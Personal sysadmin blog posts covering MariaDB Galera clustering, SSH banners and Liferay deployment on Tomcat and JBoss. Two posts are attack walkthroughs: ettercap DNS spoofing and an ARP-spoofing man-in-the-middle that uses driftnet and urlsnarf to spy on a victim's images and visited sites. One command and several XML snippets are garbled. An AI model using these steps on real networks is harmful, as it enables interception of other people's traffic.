Gab Knowledge Base

Tuesday, July 12, 2016

spoof DNS using kali linux

1. locate a file by the name etter.dns
#locate etter.dns

2. open the file using nano/vi/vim

3. edit after the line "*wildcards in PTR are not allowed"

example, you can add this below that line

www.msn.com A 192.168.1.8

4. go to /proc/sys/net/ipv4 and edit ip_forward to 1

5. start the ettercap

ettercap -T -q -M arp:remote -P dns_spoof

(enter q to abort)

reference
https://www.cybrary.it/0p3n/infosec-101-dns-spoof/

Monday, April 18, 2016

Environment i using
OS: RHEL7
database: MariaDB 10.1.13
firewalld: off
SElinux: off

===== Install MariaDB =====

default in your OS, it had mariadb include in yum repo but it was using old version.
Please add this repo to enable the latest version officially from MariaDB

# vim /etc/yum.repo.d/mariadb.repo

---------- mariadb.repo ----------

[mariadb]
name = MariaDB
baseurl = http://yum.mariadb.org/10.1/rhel7-amd64
gpgkey=https://yum.mariadb.org/RPM-GPG-KEY-MariaDB
gpgcheck=1

---------- END ----------

for the baseurl, if you are using centos or other, you can check it at here for the path

http://yum.mariadb.org/10.1/

install mariadb using this command

# yum install mariadb-server

===== Setup MaridDB for Cluster =====

open and edit my.cnf

add the section in red color

# vim /etc/my.cnf

---------- my.cnf ----------

# This group is read both both by the client and the server

# use it for options that affect everything

[client-server]

# include all files from the config directory

!includedir /etc/my.cnf.d

[galera]

wsrep_on=ON

wsrep_provider=/usr/lib64/galera/libgalera_smm.so

binlog_format=ROW

wsrep_cluster_address='gcomm://'

wsrep_cluster_name='galera_cluster'

wsrep_node_name='node1'

---------- END ----------

for the 2nd database, just repeat the installation step but at my.cnf you need to edit the

wsrep_cluster_address='gcomm://<node 1 IP address>'

wsrep_node_name='node2'

Start both databases

# systemctl start mariadb

MariaDB [(none)]> SHOW STATUS LIKE 'wsrep_cluster_size';

+--------------------+-------+

| Variable_name | Value |

+--------------------+-------+

| wsrep_cluster_size | 2 |

+--------------------+-------+

1 row in set (0.01 sec)

this shown above indicate got 2 node mean it was success.

you can check for other info using this command

MariaDB [(none)]> show global status like 'wsrep_%';

Monday, April 11, 2016

SSH Login Banner

there are 2 type of banner
1 is show before you login
and another is show after you success login

-------------------------------------------------------------------
Show before login

by default, there already prepare a banner for us but is not used.
it located at /etc/issue.net
it show the kernel version as banner at login
you can use this or use your own script
just create a file example
# vim /etc/ssh/banner
and put something like this

#####################
# #
# Welcome to Centos 7 #
# #
####################

then enable the banner
# vim /etc/ssh/sshd_config
find and edit this

# no default banner path
#Banner none

# no default banner path

Banner /etc/ssh/banner

then restart the sshd service

-----------------------------------------------------------------

Show after success login

# vim /etc/motd

and edit to your like

setup Liferay 7 tomcat bundle + cluster

OS = CentOS Linux release 7.2.1511 (Core)

Liferay version = liferay-portal-tomcat-7.0-ce-ga1-20160331161017956

Java = java version "1.7.0_79"

===== Liferay =====

1. download java and install it
for mine i download oracle java sdk 7 at
http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html
download the rpm for easy install and upgrade
# yum localinstall jdk-7u79-linux-x64.rpm

2. download liferay and extract it.
for mine, i extract and put it at /opt
then i rename it to liferay so it will become /opt/liferay

3. go to /opt/liferay/tomcat-8.0.32/bin
test run 1 times to confirm it was working with default settings
# ./startup.sh
use browser and try access it at
<server ip>:8080
and stop it after confirm working
# shutdown.sh

4. install tomcat native for better performance
at bin directory, extract tomcat-native.tar.gz and navigate to native directory inside it
# ./configure --with-apr=/usr/bin/apr-1-config --with-java-home=/usr/java/default --with-ssl=/usr/bin/openssl --prefix=/usr
# make
# make install

5. back to bin directory and extract commons-daemon-native.tar.gz
navigate into unix folder
# ./configure --with-java=/usr/java/default
# make
# cp jsvc ../..

6. add tomcat user for liferay to run instead of using root
# useradd tomcat
# chown -R tomcat: /opt/liferay

7. at tomcat bin directory, edit setenv.sh and change the Xmx value to suit your server memory.
for mine, i also had manual set Xms value as well

====== startup script =====

since it is using systemd for centos7, below is the guide on how to add
# cd /etc/systemd/system
# vim tomcat.service

=== tomcat.service ===

# Systemd unit file for tomcat
[Unit]
Description=Apache Tomcat Web Application Container
After=syslog.target network.target

[Service]
Type=forking
#ExecStart=/etc/init.d/tomcat start
ExecStart=/opt/liferay/tomcat/bin/startup.sh
ExecStop=/opt/liferay/tomcat/bin/shutdown.sh
User=tomcat
Group=tomcat

TimeoutStartSec=0
TimeoutStopSec=600

[Install]
WantedBy=multi-user.target

=== END ===

enable it to run at startup
# systemctl enable tomcat.service

now you can test use systemctl to start and stop to confirm it working
# systemctl start tomcat
# systemctl stop tomcat

monitor the log at /opt/liferay/tomcat/logs/catalina.out
to make sure it fully startup without error

===== Apache =====

you either can use your firewall to redirrect port 8080 to port 80
or
use mod_jk for port 80 to 8080

===== cluster =====

1. edit <liferay>/tomcat/conf/context.xml
change <Context>
to <Context distributable="true">

2. edit server.xml
change <Engine name="Catalina" defaultHost="localhost">
to <Engine name="Catalina" defaultHost="localhost" jvmRoute="node1">
then below it add this as well

=== server.xml ===

<Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster"
channelSendOptions="6">

<Manager className="org.apache.catalina.ha.session.BackupManager"
expireSessionsOnShutdown="false"
notifyListenersOnReplication="true"
mapSendOptions="6"/>

<Channel className="org.apache.catalina.tribes.group.GroupChannel">
<Membership className="org.apache.catalina.tribes.membership.McastService"
address="228.0.0.4"
port="45564"
frequency="500"
dropTime="3000"/>
<Receiver className="org.apache.catalina.tribes.transport.nio.NioReceiver"
address="auto"
port="5000"
selectorTimeout="100"
maxThreads="6"/>

<Sender className="org.apache.catalina.tribes.transport.ReplicationTransmitter">
<Transport className="org.apache.catalina.tribes.transport.nio.PooledParallelSender"/>
</Sender>
<Interceptor className="org.apache.catalina.tribes.group.interceptors.TcpFailureDetector"/>
<Interceptor className="org.apache.catalina.tribes.group.interceptors.MessageDispatch15Interceptor"/>
<Interceptor className="org.apache.catalina.tribes.group.interceptors.ThroughputInterceptor"/>
</Channel>

<Valve className="org.apache.catalina.ha.tcp.ReplicationValve"
filter=".*\.gif;.*\.js;.*\.jpg;.*\.png;.*\.htm;.*\.html;.*\.css;.*\.txt;"/>

<ClusterListener className="org.apache.catalina.ha.session.ClusterSessionListener"/>
</Cluster>
=== end ===

3. edit <liferay>/tomcat/conf/Catalina/localhost/ROOT.xml and add this into it

=== ROOT.xml ===

<Resource
name="jdbc/LiferayPool"
auth="Container"
type="javax.sql.DataSource"
driverClassName="com.mysql.jdbc.Driver"
url="jdbc:mysql://<DB IP>/<DB name>?useUnicode=true&characterEncoding=UTF-8"
username="DB username"
password="DB password"
maxActive="100"
maxIdle="30"
maxWait="60000"
/>

=== end ===

4. then at <liferay>/tomcat/webapps/ROOT/WEB-INF/classes, create portal-ext.properties file and put this into it

=== portal-ext.properties ===

jdbc.default.jndi.name=jdbc/LiferayPool

=== end ===

Wednesday, March 2, 2016

deploy liferay EE into Jboss 6 EAP manually

i am using Jboss EAP 6.4

with java 1.7.0_79

and for liferay, i am deploying Liferay Portal 6.2 EE SP14

with Liferay Portal 6.2 EE SP14 Dependencies
the dependencies is needed in order for liferay to run if you build yourself

unzip the jboss eap and install the java

create a folder call liferay and put extracted jboss into it

for mine, i put the liferay at /opt , it will look like this

/opt/liferay/jboss

1. deploy dependencies

cd to jboss folder and make new dir like this

<jboss>/modules/com/liferay/portal/main

unzip liferay-portal-dependencies-6.2-ee-sp14 and put all into <jboss>/modules/com/liferay/portal/main

put the mysql connector there as well if you using mysql

at the same directory, create a file name module.xml

and put this into it

<?xml version="1.0"?>

<resource-root path="hsql.jar" />

<resource-root path="portal-service.jar" />

<resource-root path="portlet.jar" />

<resource-root path="mysql-connector-java-5.1.38-bin.jar" />

</resources>

</dependencies>

</module>

please edit the mysql name to match yours

2. Jboss configuration

part 1

go to liferay/jboss/standalone/configuration/
and edit standalone.xml
between the </extensions> and <management> (note: should be around line 27 - 30 )
add this into it

<system-properties>

<property name="org.apache.catalina.connector.URI_ENCODING" value="UTF-8"/>

<property name="org.apache.catalina.connector.USE_BODY_ENCODING_FOR_QUERY_STRING" value="true"/>

</system-properties>

part 2

then search deployment-scanner

and add deployment-timeout="240"

it will look something like this

<deployment-scanner path="deployments" relative-to="jboss.server.base.dir" scan-interval="5000" deployment-timeout="240"/>

part 3

then search for <subsystem xmlns="urn:jboss:domain:security:1.2">

and add this into it

<security-domain name="PortalRealm">

<authentication>

<login-module code="com.liferay.portal.security.jaas.PortalLoginModule" flag="required" />

</authentication>

</security-domain>

it will look something like this

<security-domains>

<security-domain name="other" cache-type="default">

<login-module code="Remoting" flag="optional">

<module-option name="password-stacking" value="useFirstPass"/>

</login-module>

<login-module code="RealmDirect" flag="required">

<module-option name="password-stacking" value="useFirstPass"/>

</login-module>

</authentication>

</security-domain>

<security-domain name="jboss-web-policy" cache-type="default">

<policy-module code="Delegating" flag="required"/>

</authorization>

</security-domain>

<security-domain name="jboss-ejb-policy" cache-type="default">

<policy-module code="Delegating" flag="required"/>

</authorization>

</security-domain>

<security-domain name="PortalRealm">

<login-module code="com.liferay.portal.security.jaas.PortalLoginModule" flag="required" />

</authentication>

</security-domain>

</security-domains>

</subsystem>

part 4

search enable-welcome-root and change it to false

<virtual-server name="default-host" enable-welcome-root="false">

3. deploy Liferay war

create ROOT.war folder in liferay/jboss/standalone/deployments

extract the Liferay .war file into the ROOT.war folder

# jar -xvf liferay.war

at the same level with ROOT.war, create empty file call ROOT.war.dodeploy

# touch ROOT.war.dodeploy

In the ROOT.war file, open the WEB-INF/jboss-deployment-structure.xml file. In this file, replace the <module name="com.liferay.portal" /> dependency with the following configuration:

<module meta-inf="export" name="com.liferay.portal">
    <imports>
        <include path="META-INF" />
    </imports>
</module>

This allows OSGi plugins like Audience Targeting to work properly, by exposing the Portal API through the OSGi container.

reference:
1. https://www.liferay.com/group/customer/knowledge/kb/-/knowledge_base/article/23340173 (must login liferay first)

Wednesday, December 30, 2015

Liferay bundle with jboss + RHEL 7

This is the instruction on how to install jboss on Redhat Enterprise Linux 7 (RHEL 7)

you can signup and download Liferay from
https://www.liferay.com/downloads/liferay-portal/available-releases

for my case, i created /opt
and unzip the zip file into it
# unzip liferay-portal-jboss-6.2-ee-sp14-20151105114451508.zip

before we start anything, i had manual downloaded Java JDK 7 release 79 and install it
http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html

once you extract out liferay, please try to run it to confirm the file you download is working
# cd /opt/<Liferay>/<jboss-version>/bin
# ./standalone.sh

you can test it by access 127.0.0.1:8080 with browser
by default, standalone is listen to 127.0.0.1 only and if your Linux didnt install with gui, you need to mortify it.
CTRL + C to stop the jboss

# cd ..
# cd standalone/configuration/
# vim standalone.xml

---------------- Default -------------------
<interfaces>
<interface name="management">
<inet-address value="${jboss.bind.address.management:127.0.0.1}"/>
</interface>
<interface name="public">
<inet-address value="${jboss.bind.address:127.0.0.1}"/>
</interface>
<interface name="unsecure">
<inet-address value="${jboss.bind.address.unsecure:127.0.0.1}"/>
</interface>
</interfaces>

-------------- Change to -----------------
<interfaces>
<interface name="management">
<inet-address value="${jboss.bind.address.management:<your server ip>}"/>
</interface>
<interface name="public">
<inet-address value="${jboss.bind.address:<your server ip>}"/>
</interface>
<interface name="unsecure">
<inet-address value="${jboss.bind.address.unsecure:<your server ip>}"/>
</interface>
</interfaces>

----------------------------------------------

restart the jboss liferay and test again using your <server-IP>:8080
# cd ../../bin/
# ./standalone.sh

---------------- Connecting to MySQL Database ---------------------
you need to download the mysql connector from
https://www.mysql.com/products/connector/
choose JDBC Driver for MySQL (Connector/J)
extract the file and copy the mysql-connector-java-5.1.38-bin.jar
to this location
/opt/<Liferay-location/<jboss-version>/modules/com/liferay/portal/main/
edit the module.xml
add this under <resource>
<resource-root path="mysql-connector-java-5.1.38-bin.jar" />

example:

<resources>
<resource-root path="hsql.jar" />
<resource-root path="jtds.jar" />
<resource-root path="mysql-connector-java-5.1.38-bin.jar" />
<resource-root path="portal-service.jar" />
<resource-root path="portlet.jar" />
<resource-root path="postgresql.jar" />
</resources>

------------------ Configure httpd to divert traffic to Liferay jboss ------------------
Download and install httpd-devel
# yum install httpd-devel

download mod_jk from
https://tomcat.apache.org/download-connectors.cgi
extract it the file, configure, make and make install
it will automatic deploy the mod_jk into your apache

If you encounter error saying
no apache given
no netscape given
configure: error: Cannot find the WebServer

then you need to configure --with-apxs
but before that, find out your apxs location
# find / -iname apxs
# ./configure --with-apxs=/usr/bin/apxs

now go to /etc/httpd/conf.d/
create worker.properties file and put this into it
# vim worker.properties

worker.list=worker1,node1,status
worker.jkstatus.type=status

#node1
worker.node1.port=8009
worker.node1.host=172.20.17.64
worker.node1.type=ajp13
worker.node1.lbfactor=1
worker.node1.ping_mode=A

# Load-balancing behaviour
worker.worker1.type=lb
worker.worker1.balance_workers=node1
worker.worker1.sticky_session=1

then create mod_jk.conf file and put this into it
# vim mod_jk.conf

LoadModule jk_module modules/mod_jk.so

<IfModule mod_jk.c>
JkWorkersFile /etc/httpd/conf.d/worker.properties
JkShmFile /var/log/httpd/mod_jk.shm
JkLogFile /var/log/httpd/mod_jk.log
JkLogLevel info,debug
JkLogStampFormat "[%a %b %d %H:%M:%S %Y] "

JkMount /* worker1
</IfModule>

Before we start apache, we need to configure the jboss to listen to port 8009 AJP1.3
by default it was disable at standalone.xml

# cd /opt/liferay-portal-6.2-ee-sp14/jboss-7.1.1/standalone/configuration/
# vim standalone.xml

----- default ------
<subsystem xmlns="urn:jboss:domain:web:1.1" default-virtual-server="default-host" native="false">
<configuration>
<jsp-configuration development="true"/>
</configuration>
<connector name="http" protocol="HTTP/1.1" scheme="http" socket-binding="http"/>
<virtual-server name="default-host" enable-welcome-root="false">
<alias name="localhost"/>
<alias name="example.com"/>
</virtual-server>
</subsystem>

------- change to --------
<subsystem xmlns="urn:jboss:domain:web:1.1" default-virtual-server="default-host" native="false">
<configuration>
<jsp-configuration development="true"/>
</configuration>
<connector name="ajp" protocol="AJP/1.3" scheme="http" socket-binding="ajp"/>
<virtual-server name="default-host" enable-welcome-root="false">
<alias name="localhost"/>
<alias name="example.com"/>
</virtual-server>
</subsystem>

-----------------------------

Start jboss and httpd service and test it by accessing your server ip without port 8080

once success to see the pages, now we need to create a startup script

---------- startup --------------

by default, in jboss/bin/init.d directory, it already have the startup script name jboss-as-standalone.sh

If you are using RHEL 6 or before, you can just make a symlink from /etc/init.d/jboss and point to this file

for RHEL7, it a bit tricky since it use systemd

but before that, edit the jboss-as-standalone.sh and define the

JBOSS_CONF="/opt/<liferay-location>/<jboss-ver>/bin/init.d/jboss-as.conf"

JBOSS_HOME=/opt/<liferay-location>/<jboss-ver>

then go to /usr/lib/systemd/system
create jboss.service file and put this

[Unit]
Description=Jboss Application Server
After=syslog.target
After=network.target

[Service]
Type=forking
PIDFile=/var/run/jboss-as/jboss-as-standalone.pid
ExecStart=/opt/<liferay-location>/<jboss-ver>/bin/init.d/jboss-as-standalone.sh start
ExecStop=/opt/<liferay-location>/<jboss-ver>/bin/init.d/jboss-as-standalone.sh stop
TimeoutStartSec=300
TimeoutStopSec=300

[Install]
WantedBy=multi-user.target

then go to /etc/systemd/system/multi-user.target.wants and create symlink point to the file just now
then enable this for startup list
# systemctl enable jboss.service

Monday, August 10, 2015

man in the middle - hacking

use netdiscover to find out ip if uncertain which IP range it use
use nmap to find out more info
# nmap 172.20.1.30
or
# nmap 172.20.1.1/24

used command
Arpspoof

Driftnet

setup port forwarding
Change the value in your /proc/sys/net/ipv4/ip_forward from 0 to 1 - See more at: http://www.hacking-tutorial.com/tips-and-trick/how-to-set-up-port-forwarding-in-linux-and-windows/#sthash.YQIMORR4.dpuf

Victim IP address : 192.168.8.90

Attacker network interface : eth0; with IP address : 192.168.8.93

Router IP address : 192.168.8.8

And then setting up arpspoof from to capture all packet from router to victim.

# 168.8.90 192.168.8.8

After step three and four, now all the packet sent or received by victim should be going through attacker machine.
Now we can try to use driftnet to monitor all victim image traffic. According to its website,
Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.
to run driftnet, we just run this
# driftnet -i eth0

To stop driftnet, just close the driftnet window or press CTRL + C in the terminal

For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this code
# urlsnarf -i eth0

and urlsnarf will start capturing all website address visited by victim machine.

When victim browse a website, attacker will know the address victim visited.